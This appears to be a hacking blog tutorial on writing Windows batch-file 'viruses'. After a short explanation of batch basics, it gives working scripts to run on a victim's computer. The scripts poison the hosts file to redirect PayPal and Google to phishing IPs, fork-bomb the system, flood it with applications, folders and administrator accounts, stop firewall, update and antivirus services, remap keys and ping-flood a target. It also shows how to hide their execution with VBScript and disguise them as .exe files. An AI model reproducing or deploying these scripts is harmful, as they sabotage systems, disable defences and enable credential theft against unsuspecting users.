Howdy! In this article we are going to learn how to create some virus programs with the help of batch scripts.
Let’s get on to some grey shade of the Batch Programming. Wait, wait,
what is this Batch Programming first?
Don’t worry, by the end of this article you are going to learn what is batch programming and some cool stuff like virus programming with batch script.
1.What is batch?
Simple to say the general meaning of the batch is collection of things as one unit. Technically we call them as set of commands here.
Batch file contains a set of commands which are going to be executed at operating system level. Usually batch files are having .bat extension. These files are interpreted by line-by-line at command line interpreter cmd.exe in all DOS operating system family like FreeDos and MS-Dos etc. in Unix like operating systems batch file is called as shell script. Batch of commands executed in single script is called batch script.
2.What is batch programming?
It is a native programming language for windows which deals with the Dos commands as a sequence. Batch files are programmed by set of commands which are going to executed line-by-line. This sequence of command is used for lower level operations at disk operations and at operating system level. usually like deleting the same or different type of files, clearing the system process, killing the tasks, scheduling the process IDs, clearing some crap errors in operating system etc.
Creating programs to do some automated tasks like deleting temporary files and any other actions can be done using batch programming in windows and shell scripting in Linux
What are the modes in the batch?
These are divided into two types of batch modes.
- interactive mode.
In this mode human interaction is needed to perform the task after execution for the file. Basing on the human input operations are going to be done. This is like program asking for do you really want to delete any file or asking how many times you want a particular thing to be done.
- batch mode (silent mode).
This mode is completely opposite to interactive mode. After execution of the batch file everything will be done silent in the background. There is no need of human interaction in this mode. No need no inputs or instructions for our side.
Now we are going to build our batch virus in this mode. But before going to that we must need to familiar about the commands which are going to be used.
3.Type of batch commands.
- internal commands.
Internal commands are those which come by default with operating systems in other words we call them as built-in commands. For example, dir, cls, echo, del and many more.
- external commands.
External commands resemblance the command often created after installing any applications. Mostly some external commands will only work in run box. For example: PsExec, PsFile, PsGetSid, PsInfo, PsKill, PsList, PsLoggedOn and so on.
“cd” —- change director.
“: and goto” —- for loop implication.
“echo” —- print.
“echo off” —- stop printing the execution of batch file.
“call” —- used for triggering or calling the file and commands.
“start” —- to start application and services.
“net users” —- Adds or modifies user accounts, or displays user account information
“%random%” —- environmental variable
“net stop” —- used for stopping services of user accounts
“reg add” —- adding content to register editor
“ping” —- sending packets over network to find host alive or dead
4.How to create a batch program?
For creating a batch program open any text editor and program with some commands and save with extension .bat that’s it you’ll get an executable batch program. The logo will be like this for batch files
5.Programming virus for windows machines.
Before going to start a small caution! with all the information in this article is only for educational purpose. We are not responsible for the things you do. Let’s get started with
Folder Replicator Virus:
cd\ cd C:\Users\username\Desktop :loop md Virus cd Virus goto loop
Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username. It is path very you want to see the magic. The folders replication will happen on that location. Then run it on the Victims computer to infect it.
Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on. This will create directory inside another directory with the same name, so it doesn’t look like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code.
DNS poisoning:
Batch file can have the ability to modify the DNS hostsfile that resides inside ‘C:\windows\system32\drivers\etc\hosts’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a fake website which looks exactly like the legitimate one, created by hackers and then steal credentials. But for this script you need administrative privileges.
@echo off echo 10.109.74.45 www.google.com >> C:\windows\system32\drivers\etc\hosts echo 10.115.46.73 www.paypal.com >> C:\windows\system32\drivers\etc\hosts exit
This program creates a new entry in the hosts file, so that whenever the user attempts to get that site he/she will be redirected to fake phishing site hosted on that IP we have changed. In the above case whenever the user tries to open www.paypal.com will be redirected to 10.115.46.73 hacker will build a fake PayPal site which looks exactly same as the original legitimate site. Such that he can get the credentials when you entered.
Interesting Read: Video Tutorial of DNS Poisioning
Fork Bombing:
Most of us have heard about the word ‘fork()’, which is used to create new process, like wise fork bombing is nothing but calling a program by itself again and again with an infinite loop and making the system to crash by popping up hundreds of windows on the screen.
@echo off :loop Explorer Call forkBomb.bat Goto loop
Copy the above program and paste it in a notepad file and save it as ‘forkBomb.bat’. The explorer command given inside the file will make file explorer open, then because of loop same batch file is called again which in turn opens up multiple file explorer, likewise it goes on by calling the program itself again and again until the system crashes or hangs up.
Application Bomber:
Application bomber is much like the Fork Bombing that we previously seen, but here when the file executed it will begin to start opening all the applications programmed in that file and the loop continuous until the user closed the cmd terminal which this batch file is running.
@echo off :loop start notepad start winword start mspaint start write start cmd start explorer start control start firefox start msconfig goto loop
This batch program will open up the following applications such as notepad, MS word, Microsoft paint, WordPad, command prompt, file explorer, control panel and Firefox in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots.
User Flooder:
user flooder is program which flooded with the user accounts. It will begin to create a lot of user accounts in the system which it is going to executed.
@echo off :usrflood set usr=%random% net users %usr% %random% /add net localgroup administrators %usr% /add goto usrflood
User accounts will be created with the random number as username by the environment variable “%random%”. And password will also have allotted directly as programmed it is also a random number. All the user accounts will be assigned administrator rights.
Matrix Folder flooder:
The following program is going to flood your computer with folders. This program has the tendency to create more than 3000 folders in just less than a minute with random numbers.
@echo off :loop mkdir %random% goto loop
Above is screenshot from my desktop in the top left corner you can see the flood named batch file. I have run that file only for 2 seconds it messed up my desktop that’s why hulk looks more angry!
Service Disabler:
Yes! What you are thinking is right. The below code snippet will be going to stop some critical services of windows.
@echo off net stop "Windows Firewall" net stop "Windows Update" net stop Workstation net stop "DHCP Client" net stop "DNS Client" net stop "Print Spooler" net stop Themes exit
this program will start stopping the above-mentioned system services. The thing I like most with this piece of code is, it can also stop the services of anti-virus. So that we can do more malicious activities that anti-virus can’t stop us anymore. The victim need to enable or start the stopped services manually.
Keystroke Re-mapper:
The following code of snippet of batch program helps re-map the keystroke by changing the ‘scancodemap’ entry in the registry editor. The enclosed code here changes the key from A to B, so that if any users press ‘a’ key on the keyboard he will be getting the ‘b’ displayed on the screen, likewise you may map any keys.
@echo off reg add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "ScancodeMap" /t REG_BINARY /d 00000000000000000200000030001e0000000000 exit
If you want to make your hands dirty for remapping other keys, you have to refer the ascii codes for each key that was pre-assigned.
Packet flooder:
Pack flooder will be act like ping of death. This will be going to slow down the computer in your network by entering the IP address of the system in our code. But one disadvantage with this code is, it also slow down our system because it opens lot of cmd terminals. Leads to terminals flood on your system.
@echo off :loop ping -l 65535 -t 192.168.1.101 start pingflooder.bat goto loop
or else you can run this code on the victim system and enter the ip address of the victim itself. So it become two way attack.
Stealthy Virus using VBscript:
The only problem with above all batch virus codes are it will begin to open cmd terminal when executed. So that victim will aware of something abnormal. So, we are going to make these viruses in stealth mode.
Set objShell = CreateObject("WScript.Shell") strCommand = "C:\yourfile.bat" objShell.Run strCommand, vbHide, TRUE
All you need to do is just copy yours batch virus path with name and extension in your computer and paste in the above vbscrpit (visual basic). So, don’t need to execute the batch file, it’s enough to execute this VBscript, it makes the batch file to execute in stealth mode. it runs in background remains hidden. This file need to save in .vbs extension. This will make our virus hidden while executing. The only way to end the process is to open the task manager and kill the process that says WScript.
Converting batch files into executable files:
Up to now we have seen a lot of things, creating virus programs making them stealth while executing on the victim’s computer. Here, one more thing if the victim is aware of the batch programming then there is a chance to open the source code of yours by him. So, to decrease that possibility we can convert .bat extension to .exe. it will look like an executable file. so that it will become hard for the people to find, what the program exactly does.
To download the converter goto this link: [button color=”black” size=”small” link=”www.f2ko.de/en/b2e.php” icon=”” target=”true”]Download[/button]
Or else you can try online also.
That’s all I have for this article. Hope you like it, happy hacking!!!
Must Read: How to Access Dark Net For Free?
Leave a Reply